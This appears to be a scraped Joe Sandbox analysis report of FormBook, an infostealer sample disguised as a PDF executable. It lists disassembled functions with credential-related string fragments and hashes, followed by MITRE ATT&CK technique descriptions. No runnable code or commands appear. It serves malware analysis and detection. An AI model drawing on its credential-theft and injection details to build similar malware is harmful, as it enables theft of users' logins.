String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: c6cff2a5241cc38a58af40130a36ae6aa43869701a7b8dc3b8471f73d06e67ac
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: B6C1A074618E1A4FD798EF68C495AAAB7E1FBA4704F60432D944EC7650DF30EA02CBC5

Function 11448CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

UR, xrefs: 11448D5F
Pass, xrefs: 11448D97
word, xrefs: 11448D9E
2, xrefs: 11448DE1
L: , xrefs: 11448D66
name, xrefs: 11448DB2
User, xrefs: 11448DAB

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 1028f2122d179cfa369f4ebaa65d479242641685237011ae896180e8e48deaa0
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 0CA1DD746187488BEB58DFA8D444BEEB7E1FF98704F40462DE48AD7282EF309545C789

Function 11448CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

UR, xrefs: 11448D5F
Pass, xrefs: 11448D97
word, xrefs: 11448D9E
2, xrefs: 11448DE1
L: , xrefs: 11448D66
name, xrefs: 11448DB2
User, xrefs: 11448DAB

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: d2f4cc670fe8f8c15402c15e0de9c44872a1f5909e8a22115ac2da80b84907c0
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 9791BD74618B4C8BEB58DFA8D444BEEB7E1FB98704F40462EE48AD7242EB309545C789

Function 11448352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

., xrefs: 114483B0
e, xrefs: 1144848E
v, xrefs: 114484A0
n, xrefs: 114483E7
, xrefs: 1144847C

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: f96f4a92766a1878754157bd2e799331ffdface81fddd553d667e0576c374e48
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 54719175618B4A8FE758DFA8C4886AAB7F1FF58704F10062ED44AC7221EF71E945CB81

Function 112E8352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

, xrefs: 112E847C
., xrefs: 112E83B0
e, xrefs: 112E848E
v, xrefs: 112E84A0
n, xrefs: 112E83E7

Memory Dump Source

Source File: 00000007.00000002.4604358866.00000000112E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_112e0000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: e8eb3d46999307a0f27d5c469354ab63c564f2d9b3b60cd0b8671da0821c9aac
Instruction ID: 71161e72f670fd9eaaea22351eb4c2418bfde25a3f65ec28e1b9ffbbd24908a6
Opcode Fuzzy Hash: e8eb3d46999307a0f27d5c469354ab63c564f2d9b3b60cd0b8671da0821c9aac
Instruction Fuzzy Hash: 8C71C431618B4A8FD718DFA8C4887AAB7F1FF58304F40062ED48AC7261EF71E9458B85

Function 11443C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

shel, xrefs: 11443C90
dll, xrefs: 11443C9E
l32., xrefs: 11443C97
ole3, xrefs: 11443C5D
2.dl, xrefs: 11443C64

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 38e8dbbd98af7843acb70596adf4b284308263713c52b89272d18b5378542234
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 0A5180B4918B4D8FDB64DFA4C0456EEB7F1FF28301F50462E949AE7254EF30A5418B89

Function 1144486F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

\, xrefs: 114449E0
dll, xrefs: 114448F4
ion., xrefs: 114448EC
vers, xrefs: 114448E4
4, xrefs: 114449E9

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 5383292bfedbd1cc19f72e7ae23759546ce19adac5c7b5331711c0f097b27b25
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 6E41A434218B8D8FEBA5DF2898457EA77E0FB98705F51462E984EC7640EF30D505C782

Function 114464B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

sspi, xrefs: 1144650E
user, xrefs: 114464D3
cli., xrefs: 11446515
dll, xrefs: 1144651C
32.d, xrefs: 114464DA

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 73f605fbddafcfc56d3e58a5ab16f084243b2afc304252aa1d5897241e61d0f9
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: B7416C30A18E0DCFEB98EF6890947AD77E1FB68705F60416EA80ED7744DA31D9418BC6

Function 11444432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

h, xrefs: 1144451F
kern, xrefs: 1144452A
el32, xrefs: 11444537
.dll, xrefs: 1144453F

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 7076cc57a81475a9fc8ab168b2c6d2ef3964f13563fe7ab0fdb9a9caff46b456
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 56419570608B898FE765CF2880843AAB7E1FB98704F24462E959EC3655DF70D545CB81

Function 1144B0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

, xrefs: 1144B184
f fr, xrefs: 1144B13D
om:, xrefs: 1144B146
Snif, xrefs: 1144B154

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 1dd02ae5e23a606d9a2d23e37cd1ba9d50f81755802a1b0d307667d6a46b89a6
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: E831027450CB886FE75ADF28C0846DAB7D0FB94700F60491EE49BC7652EE30A54ACB43

Function 1144B0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

, xrefs: 1144B184
f fr, xrefs: 1144B13D
om:, xrefs: 1144B146
Snif, xrefs: 1144B154

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 7c5cea84da0336e2991e3a9c0331238164a2bfe3df34ce413b1541a8472aa5c4
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 2C31E175508B486FE759DF28C484AEAB7D4FBA4700F60491EE49BC7652EE30E50ACA43

Function 11446FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

me_c, xrefs: 11446FEE
hild, xrefs: 11446FF6
.dll, xrefs: 11446FFE
chro, xrefs: 11447023

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 1efeb20b180758564d03062ee0442e09af7ef3500a2f002070210c9399d4985c
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 4231BE78118F094FEB84EF288094BAAB7E1FBA8704FA0062DA44ECB254DF30E505C742

Function 112E6FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 112E7023
hild, xrefs: 112E6FF6
.dll, xrefs: 112E6FFE
me_c, xrefs: 112E6FEE

Memory Dump Source

Source File: 00000007.00000002.4604358866.00000000112E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_112e0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: d80e3e9abc04af598df40e15355f9ab4980288758fd7d130a15a0f73e66f5a6c
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: B0317E34119B0A4FC784EF698498BAAB7E1FF98304FD4062DA44ECB254DF30D505C792

Function 11446FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

me_c, xrefs: 11446FEE
hild, xrefs: 11446FF6
.dll, xrefs: 11446FFE
chro, xrefs: 11447023

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 814dc8d3b7f23a770c4e799e716e3a43fecfa345e295ba1b1c773a4854189fc2
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 2D31AD78118B094FDB84DF688494BAAB7E1FFA8704FA4462DA44ECB254DF30E501C742

Function 112E6FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 112E7023
hild, xrefs: 112E6FF6
.dll, xrefs: 112E6FFE
me_c, xrefs: 112E6FEE

Memory Dump Source

Source File: 00000007.00000002.4604358866.00000000112E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_112e0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: fa21b476d53bde33e2dc6ef48960d6ccca63fd829aaebe502c8d412a146b2fa9
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 5D316D74119B0A4FC784DF698498BAAB7E1FF98304FD4462D944ECB254DF30D505CB96

Function 114498C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

on.d, xrefs: 11449902
nt: , xrefs: 1144991E
User-Agent: , xrefs: 11449935, 11449948
urlmon.dll, xrefs: 11449959

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: b7d467be11307793885f444c45e44655cf1b0242546332bef522c26233644423
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 6631DF75614A0D8FDB44EFA8C8847EEBBE0FB68609F40422ED45ED7240EF789645C789

Function 114498BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

on.d, xrefs: 11449902
nt: , xrefs: 1144991E
User-Agent: , xrefs: 11449935, 11449948
urlmon.dll, xrefs: 11449959

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 139b7677696366ec5ace4c8bd035f7dab46c9173803ee5665e447aa1bb05ae91
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: FA21E174614A0E8EDB44EFA8C8847EDBBE0FF68609F40422ED45AD7340EF7896058789

Function 1144AE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 1144AF1F
l, xrefs: 1144AF26
t, xrefs: 1144AEF4
l, xrefs: 1144AF03

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 8cd5ee1970550efbf852c4307fa004afe6f3caab92b320eb85d32f6862a5ccac
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 9D217178A24A0E9BDB88EFA8D0447EDBBF1FF18314F50462DD009D7600DB74A595CB84

Function 1144AE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 1144AF1F
l, xrefs: 1144AF26
t, xrefs: 1144AEF4
l, xrefs: 1144AF03

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 41637bc6562054a440fa71ede592f4005c1e315fa28eecd2ddc374873efe9ee0
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: CB215E78A14A0E9BDB88EFA8D0447ADBAF1FB58314F50462DD009D7610DB74A5958B84

Function 1144AFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 1144B022
user, xrefs: 1144B015
auth, xrefs: 1144B02F
logi, xrefs: 1144B03C

Memory Dump Source

Source File: 00000007.00000002.4604455184.0000000011420000.00000040.80000000.00040000.00000000.sdmp, Offset: 11420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11420000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: cfdfc5d9658de64a38417947c4368b653de781597f797cd9337157ed50175bd0
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: E521CD70614B0E8BCB85CF9998806DEB7E1EF98384F004619E40AEB345D7B0ED158BC2

Function 112EAFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

user, xrefs: 112EB015
logi, xrefs: 112EB03C
pass, xrefs: 112EB022
auth, xrefs: 112EB02F

Memory Dump Source

Source File: 00000007.00000002.4604358866.00000000112E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 112E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_112e0000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: bfcbb1808add5c8be80ddda12c7b7667b4f9096d114d7acdb0c4f728f2000cc3
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 9F21D230614B0E8BCB05CF9D98807EEB7F2EF88344F00461AD40AEB245D7B4E9148BD6

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 101 2043 5770 pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

